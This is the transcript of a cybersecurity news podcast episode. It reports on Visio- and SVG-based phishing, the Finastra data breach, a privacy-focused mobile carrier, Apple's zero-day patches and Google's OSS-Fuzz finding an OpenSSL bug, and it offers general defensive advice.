Apple Patches Two Zero-Day Flaws Targeting Intel-Based Macs, American FinTech Giant Has 400GB Of Customer Data Stolen before hacker disappears, Beware of Two-Step Phishing and SVG Attachments, A New Secure Phone System Is Launched for High Risk Individuals and Google’s OSS Fuzz uncovers a Decades old bug in Open SSL.
This is Cyber Security Today. I’m your host, Jim Love
Cybersecurity experts are warning of two emerging phishing attack strategies—two-step phishing (2SP) using Microsoft Visio files and scalable vector graphics (SVG) attachments. These tactics, designed to evade detection, exploit trust and human error to steal credentials and deploy malware.
Two-Step Phishing Attacks
Researchers from Perception Point highlight a surge in two-step phishing attacks that weaponize Microsoft Visio (.vsdx) files. Commonly used for data visualization, these files are now embedded with malicious URLs. The attack unfolds in layers:
- Victims receive a seemingly legitimate email containing a business proposal or purchase order.
- Clicking a URL leads to a compromised Microsoft SharePoint page hosting a Visio file.
- Inside the file, another clickable URL redirects victims to a fake Microsoft 365 login page designed to steal credentials.
A key tactic involves instructing victims to “hold down the Ctrl key and click,” a move designed to bypass automated security scanners. Robust two-factor authentication (2FA) is recommended to thwart such attacks.
SVG Attachments in Phishing
Threat actors are also leveraging SVG attachments, which can execute JavaScript or display credential-stealing forms. Unlike traditional image formats, SVG files use mathematical formulas, making them harder for security software to detect.
– SVGs can mimic Excel spreadsheets or forms, tricking users into entering sensitive information.
– In some cases, JavaScript embedded in SVGs redirects users to malicious websites upon opening the attachment.
Mitigation Strategies
Experts emphasize human vigilance as the first and last line of defense.
– For Visio-based attacks: Avoid following unexpected instructions like holding down the Ctrl key and clicking. Verify the sender and context of the email.
– For SVG attachments: Treat these files as suspicious, especially if they’re uncommon in your workflow. Verify the sender’s identity and intent before opening.
By combining these strategies with technical safeguards like two-factor authentication and robust email security, individuals and organizations can better protect against these sophisticated phishing campaigns.
Finastra Probes Data Breach After 400GB of Customer Data Stolen
Finastra, a global financial technology leader serving 45 of the world’s top 50 banks, is investigating a significant data breach involving its internal file transfer platform. Cybercriminals reportedly exfiltrated over 400GB of customer data, which has since been advertised for sale on dark web forums.
On November 7, Finastra’s security team detected suspicious activity, and the company immediately notified affected customers. In a statement, Finastra revealed that no malware was deployed and no files beyond the exfiltrated data were accessed. Investigations point to compromised credentials as the likely root cause.
A cybercriminal known as “abyss0” began selling the stolen data in late October, initially pricing it at $20,000 before reducing it to $10,000. The data includes sensitive information from Finastra’s major banking clients, though the cybercriminal’s subsequent disappearance has raised questions about the breach’s resolution.
Finastra has replaced the compromised platform with a secure alternative and is working to identify affected customers. The company’s Chief Information Security Officer (CISO) is actively engaging with client security teams and sharing Indicators of Compromise (IOCs) to prevent further incidents.
This breach comes after a ransomware attack in 2020 that disrupted Finastra’s operations but apparently did not result in a ransom payment.
The hacker abyss0 has apparently mysteriously disappeared and his Telegram and BreachForums accounts were closed.
Privacy-First Mobile Carrier Launches for High-Risk Users
A new privacy-focused telecom service, Cape, is launching today, offering public figures, executives, journalists, and activists a secure way to use mobile networks with minimal data collection. The service aims to address rising concerns over government surveillance and cyberattacks, particularly from state-sponsored actors.
Cape’s service, built on the U.S. Cellular network, uses proprietary software to limit user data collection. Unlike traditional carriers, Cape stores only essential subscriber information for 60 days and enables users to rotate identifiers like device and advertiser IDs on-demand. This makes it harder for apps and brokers to track and monetize user data.
Cape’s device, a standard Android phone with modified data settings, is optional. Customers can use their own phones and port their numbers, with updates handled via eSIM technology. CEO John Doyle, a former Palantir executive and U.S. Army special forces sergeant, explained that Cape tested its services with national security professionals, government officials, and privacy advocates to refine its offering.
While the service provides robust privacy protections, it comes at a high cost, with some plans reaching $1,000 monthly. Cape is working to make its service more affordable for groups like journalists and domestic violence survivors and plans to expand to the general public next year with competitive pricing.
Apple Patches Two Zero-Day Flaws Targeting Intel-Based Macs
Apple has released emergency updates to address two zero-day vulnerabilities affecting Intel-based Mac systems. The flaws, found in macOS Sequoia’s JavaScriptCore and WebKit components, were exploited in attacks, according to an advisory issued by the company on Tuesday.
– CVE-2024-44308 (JavaScriptCore):Allows remote code execution through maliciously crafted web content.
– CVE-2024-44309 (WebKit): Enables cross-site scripting (XSS) attacks.
Both vulnerabilities were discovered by Clément Lecigne and Benoît Sevens of Google’s Threat Analysis Group. While Apple has not disclosed how the exploits were used, it confirmed that the flaws have been addressed in macOS Sequoia 15.1.1, as well as in updates for iOS, iPadOS, and visionOS.
These fixes bring Apple’s total number of patched zero-days in 2024 to six, a marked improvement compared to 2023 when the company addressed 20 such vulnerabilities. Security researchers recommend users update their devices immediately to mitigate potential risks.
Google’s AI Tool OSS-Fuzz Uncovers Decades-Old Bug in OpenSSL
Google’s AI-powered fuzzing tool, OSS-Fuzz, has identified over 26 previously undetected vulnerabilities, including a critical flaw in the OpenSSL library (CVE-2024-9143). This bug, reportedly present for two decades, highlights the transformative potential of large language models (LLMs) in security research.
OSS-Fuzz uses fuzzing techniques—injecting random data into software—to uncover errors that traditional, human-driven fuzzing might miss. According to Google’s open source security team, this AI tool has discovered vulnerabilities in widely used software like OpenSSL and the cJSON project, demonstrating its ability to detect complex bugs that could evade human scrutiny.
Introduced in 2023, OSS-Fuzz has progressively automated more steps in the fuzzing process, now handling the first four phases of vulnerability detection, including drafting fuzz targets, resolving compilation issues, and triaging crashes. Google plans to further enhance the tool by enabling it to generate vulnerability patches, aiming for a fully automated workflow.
AI-driven tools like OSS-Fuzz are gaining traction across the industry. Google’s separate LLM-based tool, Big Sleep, recently found a memory-safety flaw, and Protect AI’s Vulnhuntr has uncovered zero-day vulnerabilities in Python projects. These advancements signal a shift in cybersecurity, as researchers increasingly rely on AI to preemptively address threats that may already be exploited by malicious actors.
Sources include: Google Blog Post, The Register.
That’s our show for today.
You can find links to reports and other details in our show notes at technewsday.com. We welcome your comments, tips and the occasional bit of constructive criticism at editorial@technewsday.ca
I’m your host, Jim Love, thanks for listening.